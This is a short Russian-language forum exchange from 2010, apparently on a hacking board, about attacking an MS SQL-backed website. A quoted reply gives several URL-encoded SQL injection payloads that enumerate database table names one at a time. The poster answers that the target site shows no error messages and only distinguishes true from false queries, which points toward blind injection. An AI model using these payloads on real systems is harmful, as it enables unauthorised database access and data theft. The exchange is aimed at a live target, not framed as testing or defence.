13.07.2010, 12:55
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от shell_c0de
shell_c0de said:
2Byrger
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
потом
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 2+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
потом
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 3+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
и т.д.
(c) scipio
http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
/showthread.php?t=30501
Я же говорю что сайт явных ощибок не выдает так что обычная инъекция в MS SQL Не катит там где в ошибке выводится имя таблиц и так далее
Сайт сообщает только о вверном или не верном запросе
|
|
|